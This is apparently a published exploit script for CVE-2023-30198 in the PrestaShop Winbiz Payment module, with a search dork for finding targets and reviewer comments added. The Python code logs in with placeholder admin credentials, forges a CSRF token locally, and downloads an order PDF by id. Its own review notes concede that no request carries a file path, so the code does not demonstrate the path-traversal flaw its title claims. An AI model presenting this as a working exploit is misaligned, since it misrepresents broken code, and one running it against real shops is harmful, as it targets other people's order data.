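# Exploit Title: PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory
# Date: 2023-06-20
# Dork: /modules/winbizpayment/downloads/download.php
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Vendor Homepage: https://shop.webbax.ch/modules-pour-winbiz/153-module-prestashop-winbiz-payment-reverse.html
# Version: 17.1.3 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-30198
#
# NOTE(review): as written, this script authenticates and then requests a
# single order PDF by numeric id. No request parameter carries a file path,
# so the script does not by itself exercise the pathname-restriction weakness
# named in the title. Treat it as a description of the affected endpoint
# rather than as a verified reproduction.
#
# NOTE(review): for defenders, the endpoint given in the "Dork" line above is
# the path to look for in web access logs. Confirm the affected and fixed
# module versions against the CVE record and the vendor advisory; the
# "Version" field above is reproduced as the author gave it.
import random
import string

import requests

# Upper bound (seconds) on each HTTP request so an unresponsive host cannot
# block the script indefinitely.
REQUEST_TIMEOUT = 30

# The base URL of the site under test (placeholder value).
base_url = "http://example.com"

# The URL of the login page
login_url = base_url + "/authentication.php"

# The username and password for the admin account (placeholder values as
# published; never commit real credentials to a script like this).
username = "admin"
password = "password123"

# The URL of the module's download.php file
download_url = base_url + "/modules/winbizpayment/downloads/download.php"

# The ID of the order to download
order_id = 1234

# The path to save the downloaded file.
# NOTE(review): this is a predictable name in a shared temp directory and an
# existing file at that path is overwritten.
file_path = "/tmp/order_%d.pdf" % order_id

# The session cookies to use for the requests
session_cookies = None

# Generate a random string for the CSRF token.
# NOTE(review): this value is produced locally and is never obtained from the
# server, so it is not a token the server issued.
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))

# Send a POST request to the login page to authenticate as the admin user
login_data = {"email": username, "passwd": password, "csrf_token": csrf_token}
session = requests.Session()
response = session.post(login_url, data=login_data, timeout=REQUEST_TIMEOUT)
# Stop here on an HTTP error instead of continuing with an unauthenticated
# session.
response.raise_for_status()

# Save the session cookies for future requests.
# The Session object already resends its own cookies; the explicit copy is
# kept because the download request below passes it.
session_cookies = session.cookies.get_dict()

# Generate a random string for the CSRF token (again produced locally)
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))

# Send a POST request to the download.php file to download the order PDF
download_data = {"id_order": order_id, "csrf_token": csrf_token}
response = session.post(
    download_url,
    cookies=session_cookies,
    data=download_data,
    timeout=REQUEST_TIMEOUT,
)
# Do not write an error page to disk under a .pdf name.
response.raise_for_status()

# Save the downloaded file to disk. The body is written as received; nothing
# here verifies that it is actually a PDF.
with open(file_path, "wb") as f:
    f.write(response.content)

# Print a message indicating that the file has been downloaded
print("File downloaded to %s" % file_path)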